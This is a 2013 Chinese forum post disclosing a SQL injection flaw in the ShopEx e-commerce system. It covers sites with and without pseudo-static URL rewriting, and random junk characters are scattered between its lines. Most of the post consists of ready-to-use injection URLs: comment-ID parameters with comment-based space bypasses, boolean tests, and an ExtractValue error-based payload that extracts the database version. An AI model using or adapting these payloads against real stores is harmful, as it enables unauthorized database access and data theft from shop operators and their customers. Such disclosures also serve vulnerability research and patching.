注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…
9 R/ b2 f; U% w( X" i( e$ o2 P' x! F2 G, ~3 O
好吧,我扯远了~~
% X$ i7 A! _9 |- x# p- V% }0 _& K其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
4 _: G; _: i" F5 Q; B# [+ J/ K2 K不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
& l5 J) g X) V! M$ N
5 M7 |% b% {; N( f! C1 A9 phttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html) d: t# ]; H6 U9 k; ]
8 d, i# q$ x% _http://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
( A: H& _1 ~, ^& `
/ y1 Q3 g/ t+ dhttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html9 T2 {4 T7 |& Y3 d- L7 |8 U
) k |. i4 J( d* _
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
' J# H( V# k0 z' Y
, q; L7 n( }% u+ E " e+ m3 R1 Q, K' a
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
1 x# u2 B1 R1 D+ l8 Q如何注入就不多说了,10多年的东西了…不会也会了…& A x3 M) W- [
; ^" y1 B. }$ w$ L$ ]& m |
发表于 2013-2-4 16:20:04
收藏
支持
反对